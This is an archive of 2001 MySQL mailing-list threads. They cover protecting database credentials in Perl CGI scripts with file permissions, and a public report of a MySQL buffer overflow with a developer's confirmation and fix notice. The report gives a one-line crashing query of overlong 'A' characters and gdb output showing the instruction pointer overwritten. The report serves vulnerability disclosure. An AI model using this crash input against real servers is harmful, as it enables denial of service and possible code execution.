> 
> Million of thanks
> 
> Regards
> Taing Nguon
> 
> 
> > On Tue, 3 Apr 2001, Taing Nguon wrote:
> >
> > > Date: Tue, 3 Apr 2001 09:52:30 +0700
> > > From: Taing Nguon <[EMAIL PROTECTED]>
> > > To: [EMAIL PROTECTED]
> > > Subject: MySQL Security
> > >
> > > Dear sir or madam
> > >
> > > MySQL user's account is not related to user's account on Linux =
> > > System, so they can be different.
> > >
> > > My problem is that I use perl DBI to interact MySQL server as belows:
> > >
> > > --
> > > use DBI;
> > > $dbh =3D DBI->connect("DBI:mysql:DatabaseName","$user","$password");
> > >
> > > ---
> > >
> > > So $user and $password can be known by any users in Linux system because
> =
> > >  they are written in text format and DataBase can be changed or updated
> =
> > > by other users in Linux system easily by using Perl DBI. Is there any =
> > > way to prevent Database from being changed? Millon of thanks
> > >
> > >
> > > Regards
> > >
> > > Taing Nguon
> > >
> > >
> > >
> >
> > Sincerely,
> >
> > William Mussatto, Senior Systems Engineer
> > CyberStrategies, Inc
> > ph. 909-920-9154 ext. 27
> >
> 
> 
> 
> -
> Before posting, please check:
>http://www.mysql.com/manual.php   (the manual)
>http://lists.mysql.com/   (the list archive)
> 
> To request this thread, e-mail <[EMAIL PROTECTED]>
> To unsubscribe, e-mail <[EMAIL PROTECTED]>
> Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php
> 

Sincerely,

William Mussatto, Senior Systems Engineer
CyberStrategies, Inc
ph. 909-920-9154 ext. 27


-
Before posting, please check:
   http://www.mysql.com/manual.php   (the manual)
   http://lists.mysql.com/   (the list archive)

To request this thread, e-mail <[EMAIL PROTECTED]>
To unsubscribe, e-mail <[EMAIL PROTECTED]>
Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php

Re: MySQL Security

[Van]

Taing Nguon wrote:
> 
> > Make sure that the files are not world readable.
> 
> In Linux system, In order to run CGI in PERL script, that perl script
> must be 755. It is read by any users and Perl is written in text format, so
> Its is easy to know user and password of MYSQL. How do you think about
> this?Need More HELP
> 
> Million of thanks
> 
> Regards
> Taing Nguon
> 
Taing:

Reread my last post.  And, if not, step-by-step:
In httpd.conf
# Run web-server as this user
User www

chown www.www /www -Rf
chmod 0750 /www
chmod o-rwx /www -Rf

Done.  Now, you're perl scripts will run as user www and nobody on the system
will be able to read the perl scripts unless you add them to the www group. 
Something tells me you won't.

Regards,
Van
-- 
=
Linux rocks!!!   http://www.dedserius.com
=

-
Before posting, please check:
   http://www.mysql.com/manual.php   (the manual)
   http://lists.mysql.com/   (the list archive)

To request this thread, e-mail <[EMAIL PROTECTED]>
To unsubscribe, e-mail <[EMAIL PROTECTED]>
Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php

Re: MySQL Security

"Taing  Nguon" <[EMAIL PROTECTED]> wrote:
>
> > Make sure that the files are not world readable.
> 
>     In Linux system, In order to run CGI in PERL script, that perl script
> must be 755. It is read by any users and Perl is written in text format, so

No entirely true.  The reason the files are set to 755 on your box is because they are 
not owned by the same user as that which is running the Apache web daemon - remember 
most Apache setups (at least the smart ones) have Apache doing a chroot to "nobody" to 
prevent someone from breaking into your system as root via Apache.
--
===
"If you put three drops of poison into a 100 percent pure Java, you get - Windows. If 
you put a few drops of Java into Windows, you still have Windows."
-- Sun Microsystems CEO, Scott McNealy

__
Get your own FREE, personal Netscape Webmail account today at 
http://webmail.netscape.com/

-
Before posting, please check:
   http://www.mysql.com/manual.php   (the manual)
   http://lists.mysql.com/   (the list archive)

To request this thread, e-mail <[EMAIL PROTECTED]>
To unsubscribe, e-mail <[EMAIL PROTECTED]>
Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php

Re: MySQL Security

[Taing Nguon]

> Make sure that the files are not world readable.

In Linux system, In order to run CGI in PERL script, that perl script
must be 755. It is read by any users and Perl is written in text format, so
Its is easy to know user and password of MYSQL. How do you think about
this?Need More HELP

Million of thanks

Regards
Taing Nguon


> On Tue, 3 Apr 2001, Taing Nguon wrote:
>
> > Date: Tue, 3 Apr 2001 09:52:30 +0700
> > From: Taing Nguon <[EMAIL PROTECTED]>
> > To: [EMAIL PROTECTED]
> > Subject: MySQL Security
> >
> > Dear sir or madam
> >
> > MySQL user's account is not related to user's account on Linux =
> > System, so they can be different.
> >
> > My problem is that I use perl DBI to interact MySQL server as belows:
> >
> > --
> > use DBI;
> > $dbh =3D DBI->connect("DBI:mysql:DatabaseName","$user","$password");
> >
> > ---
> >
> > So $user and $password can be known by any users in Linux system because
=
> >  they are written in text format and DataBase can be changed or updated
=
> > by other users in Linux system easily by using Perl DBI. Is there any =
> > way to prevent Database from being changed? Millon of thanks
> >
> >
> > Regards
> >
> > Taing Nguon
> >
> >
> >
>
> Sincerely,
>
> William Mussatto, Senior Systems Engineer
> CyberStrategies, Inc
> ph. 909-920-9154 ext. 27
>



-
Before posting, please check:
   http://www.mysql.com/manual.php   (the manual)
   http://lists.mysql.com/   (the list archive)

To request this thread, e-mail <[EMAIL PROTECTED]>
To unsubscribe, e-mail <[EMAIL PROTECTED]>
Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php

Re: MySQL Security

[Taing Nguon]

> I would think that if the user does not have grant options set on the
> particular DB in the mysql.db table, then he would not be able to access
it
> using DBI, even if he is a local user.

I have already tried to do it by myself. and I found that although any user
has no MYSQL user's account, but he can still update data to Mysql Database
via perl DBI because they know user and password of MYSQL when your perl
code in written in text format?NEED more Help
Million of thanks

Regards

Taing Nguon

> At 10:52 PM 4/2/01, you wrote:
> >Dear sir or madam
> >
> > MySQL user's account is not related to user's account on Linux
> > System, so they can be different.
> >
> >My problem is that I use perl DBI to interact MySQL server as belows:
> >
> >--
> >use DBI;
> >$dbh = DBI->connect("DBI:mysql:DatabaseName","$user","$password");
> >
> >---
> >
> >So $user and $password can be known by any users in Linux system
> >because  they are written in text format and DataBase can be changed or
> >updated by other users in Linux system easily by using Perl DBI. Is there
> >any way to prevent Database from being changed? Millon of thanks
> >
> >
> >Regards
> >
> >Taing Nguon
>
>



-
Before posting, please check:
   http://www.mysql.com/manual.php   (the manual)
   http://lists.mysql.com/   (the list archive)

To request this thread, e-mail <[EMAIL PROTECTED]>
To unsubscribe, e-mail <[EMAIL PROTECTED]>
Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php

Re: MySQL Security

[William R. Mussatto]

Make sure that the files are not world readable.

On Tue, 3 Apr 2001, Taing Nguon wrote:

> Date: Tue, 3 Apr 2001 09:52:30 +0700
> From: Taing Nguon <[EMAIL PROTECTED]>
> To: [EMAIL PROTECTED]
> Subject: MySQL Security
> 
> Dear sir or madam
> 
> MySQL user's account is not related to user's account on Linux =
> System, so they can be different.
> 
> My problem is that I use perl DBI to interact MySQL server as belows:
> 
> --
> use DBI;
> $dbh =3D DBI->connect("DBI:mysql:DatabaseName","$user","$password");
> 
> ---
> 
> So $user and $password can be known by any users in Linux system because =
>  they are written in text format and DataBase can be changed or updated =
> by other users in Linux system easily by using Perl DBI. Is there any =
> way to prevent Database from being changed? Millon of thanks
> 
> 
> Regards
> 
> Taing Nguon
> 
> 
> 

Sincerely,

William Mussatto, Senior Systems Engineer
CyberStrategies, Inc
ph. 909-920-9154 ext. 27


-
Before posting, please check:
   http://www.mysql.com/manual.php   (the manual)
   http://lists.mysql.com/   (the list archive)

To request this thread, e-mail <[EMAIL PROTECTED]>
To unsubscribe, e-mail <[EMAIL PROTECTED]>
Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php

Re: MySQL Security

[Van]

Taing Nguon wrote:
> 
> Dear sir or madam
> 
> MySQL user's account is not related to user's account on Linux System, so they 
>can be different.
> 
> My problem is that I use perl DBI to interact MySQL server as belows:
> 
> --
> use DBI;
> $dbh = DBI->connect("DBI:mysql:DatabaseName","$user","$password");
> 
> ---
> 
> So $user and $password can be known by any users in Linux system because  they are 
>written in text format and DataBase can be changed or updated by other users in Linux 
>system easily by using Perl DBI. Is there any way to prevent Database from being 
>changed? Millon of thanks
> 
> Regards
> 
> Taing Nguon
Taing:

I use php3 to do my apps for web applications and chown the /www/ files to
www.www and chmod them to 0750 with the server running as user www.

This prevents any users from viewing the source code:  i.e. the /www/ files that
contain your perl scripts.  This might be an option for you if the perl user can
run as www.www and you can run those perl scripts as user www within the web
context.

This is just how I do it, but, others might have different implementations.

Best Regards,
Van
-- 
=
Linux rocks!!!   http://www.dedserius.com
=

-
Before posting, please check:
   http://www.mysql.com/manual.php   (the manual)
   http://lists.mysql.com/   (the list archive)

To request this thread, e-mail <[EMAIL PROTECTED]>
To unsubscribe, e-mail <[EMAIL PROTECTED]>
Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php

MySQL Security

[Taing Nguon]

Dear sir or madam

MySQL user's account is not related to user's account on Linux System, so they can 
be different.

My problem is that I use perl DBI to interact MySQL server as belows:

--
use DBI;
$dbh = DBI->connect("DBI:mysql:DatabaseName","$user","$password");

---

So $user and $password can be known by any users in Linux system because  they are 
written in text format and DataBase can be changed or updated by other users in Linux 
system easily by using Perl DBI. Is there any way to prevent Database from being 
changed? Millon of thanks


Regards

Taing Nguon

Re: mysql security issue

[Sergei Golubchik]

Hi!

On Jan 15, Nicolas GREGOIRE wrote:
>
>
> Sergei Golubchik a Ucrit :
> >
> > Hi!
> >
> > On Jan 12, JoUo Gouveia wrote:
> > > Hi,
> > >
> > > I believe i've found a problem in MySql. Here are some test's i've made in
> > > 3.22.27 x86( also tested on v3.22.32 - latest stable, although i didn't
> > > debug it, just tested to see if crashes ).
> >
> > Confirmed up to latest 3.23
> > This will be fixed ASAP!
>
> Is it fixed now ?
> Is there a patch available ?
>
> Please give us info, our servers are in the wild 
>
>
> Nicob

The new MySQL release with this bug fixed will be available today
(probably, in 5-10 hours).

Regards,
Sergei

--
MySQL Development Team
   __  ___ ___   __
  /  |/  /_ __/ __/ __ \/ /   Sergei Golubchik <[EMAIL PROTECTED]>
 / /|_/ / // /\ \/ /_/ / /__  MySQL AB, http://www.mysql.com/
/_/  /_/\_, /___/\___\_\___/  Helsinki, Finland (till Sunday)
   <___/

-
Before posting, please check:
   http://www.mysql.com/manual.php   (the manual)
   http://lists.mysql.com/   (the list archive)

To request this thread, e-mail <[EMAIL PROTECTED]>
To unsubscribe, e-mail <[EMAIL PROTECTED]>
Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php

Re : mysql security issue, overflow

[Nicolas GREGOIRE]

Sergei Golubchik a écrit :
> 
> Hi!
> 
> On Jan 12, João Gouveia wrote:
> > Hi,
> >
> > I believe i've found a problem in MySql. Here are some test's i've made in
> > 3.22.27 x86( also tested on v3.22.32 - latest stable, although i didn't
> > debug it, just tested to see if crashes ).
> 
> Confirmed up to latest 3.23
> This will be fixed ASAP!


Is it fixed now ?
Is there a patch available ?

Please give us info, our servers are in the wild 


Nicob

-
Before posting, please check:
   http://www.mysql.com/manual.php   (the manual)
   http://lists.mysql.com/   (the list archive)

To request this thread, e-mail <[EMAIL PROTECTED]>
To unsubscribe, e-mail <[EMAIL PROTECTED]>
Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php

Re: mysql security issue, overflow

[Sergei Golubchik]

Hi!

On Jan 12, João Gouveia wrote:
> Hi,
> 
> I believe i've found a problem in MySql. Here are some test's i've made in
> 3.22.27 x86( also tested on v3.22.32 - latest stable, although i didn't
> debug it, just tested to see if crashes ).

Confirmed up to latest 3.23
This will be fixed ASAP!

Thanks for bugreport (though you'd better mail this to us first,
and only after some - small - delay to public).

> 
> On one terminal:
> 
> spike:/var/mysql # /sbin/init.d/mysql start
> Starting service MySQL.
> Starting mysqld daemon with databases from /var/mysql
> done
> spike:/var/mysql #
> 
> 
> On the other terminal:
> 
> jroberto@spike:~ > mysql -p -e 'select a.'`perl -e'printf("A"x130)'`'.b'
> Enter password:
> (hanged..^C)
> 
> 
> On the first terminal i got:
> 
> spike:/var/mysql # /usr/bin/safe_mysqld: line 149: 15557 Segmentation fault
> nohup
> $ledir/mysqld --basedir=$MY_BASEDIR_VERSION --datadir=$DATADIR --skip-lockin
> g "$@" >>$err_log 2>&1
> 
> Number of processes running now: 0
> mysqld restarted on  Fri Jan 12 07:10:54 WET 2001
> mysqld daemon ended
> 
> 
> gdb shows the following:
> 
> (gdb) run
> Starting program: /usr/sbin/mysqld
> [New Thread 16897 (manager thread)]
> [New Thread 16891 (initial thread)]
> [New Thread 16898]
> /usr/sbin/mysqld: ready for connections
> [New Thread 16916]
> [Switching to Thread 16916]
> 
> Program received signal SIGSEGV, Segmentation fault.
> 0x41414141 in ?? ()
> (gdb) info all-registers
> eax0x1  1
> ecx0x68 104
> edx0x8166947135686471
> ebx0x41414141   1094795585
> esp0xbf5ff408   0xbf5ff408
> ebp0x41414141   0x41414141
> esi0x41414141   1094795585
> edi0x0  0
> eip0x41414141   0x41414141
> eflags 0x10246  66118
> cs 0x23 35
> ss 0x2b 43
> ds 0x2b 43
> es 0x2b 43
> fs 0x0  0
> gs 0x0  0
> (gdb)
> 
> 
> looks like a tipical overflow to me.
> Please reply asap, at least to tell me i'me not seeing things. :-)
> 
> Best regards,
> 
> Joao Gouveia aka Tharbad.
> 
> [EMAIL PROTECTED]
> 
 
Regards,
Sergei

--
MySQL Development Team
   __  ___ ___   __
  /  |/  /_ __/ __/ __ \/ /   Sergei Golubchik <[EMAIL PROTECTED]>
 / /|_/ / // /\ \/ /_/ / /__  MySQL AB, http://www.mysql.com/
/_/  /_/\_, /___/\___\_\___/  Osnabrueck, Germany
   <___/

-
Before posting, please check:
   http://www.mysql.com/manual.php   (the manual)
   http://lists.mysql.com/   (the list archive)

To request this thread, e-mail <[EMAIL PROTECTED]>
To unsubscribe, e-mail <[EMAIL PROTECTED]>
Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php

mysql security issue, overflow

[João Gouveia]

Hi,

I believe i've found a problem in MySql. Here are some test's i've made in
3.22.27 x86( also tested on v3.22.32 - latest stable, although i didn't
debug it, just tested to see if crashes ).

On one terminal:

spike:/var/mysql # /sbin/init.d/mysql start
Starting service MySQL.
Starting mysqld daemon with databases from /var/mysql
done
spike:/var/mysql #


On the other terminal:

jroberto@spike:~ > mysql -p -e 'select a.'`perl -e'printf("A"x130)'`'.b'
Enter password:
(hanged..^C)


On the first terminal i got:

spike:/var/mysql # /usr/bin/safe_mysqld: line 149: 15557 Segmentation fault
nohup
$ledir/mysqld --basedir=$MY_BASEDIR_VERSION --datadir=$DATADIR --skip-lockin
g "$@" >>$err_log 2>&1

Number of processes running now: 0
mysqld restarted on  Fri Jan 12 07:10:54 WET 2001
mysqld daemon ended


gdb shows the following:

(gdb) run
Starting program: /usr/sbin/mysqld
[New Thread 16897 (manager thread)]
[New Thread 16891 (initial thread)]
[New Thread 16898]
/usr/sbin/mysqld: ready for connections
[New Thread 16916]
[Switching to Thread 16916]

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info all-registers
eax0x1  1
ecx0x68 104
edx0x8166947135686471
ebx0x41414141   1094795585
esp0xbf5ff408   0xbf5ff408
ebp0x41414141   0x41414141
esi0x41414141   1094795585
edi0x0  0
eip0x41414141   0x41414141
eflags 0x10246  66118
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0  0
gs 0x0  0
(gdb)


looks like a tipical overflow to me.
Please reply asap, at least to tell me i'me not seeing things. :-)

Best regards,

Joao Gouveia aka Tharbad.

[EMAIL PROTECTED]



-
Before posting, please check:
   http://www.mysql.com/manual.php   (the manual)
   http://lists.mysql.com/   (the list archive)

To request this thread, e-mail <[EMAIL PROTECTED]>
To unsubscribe, e-mail <[EMAIL PROTECTED]>
Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php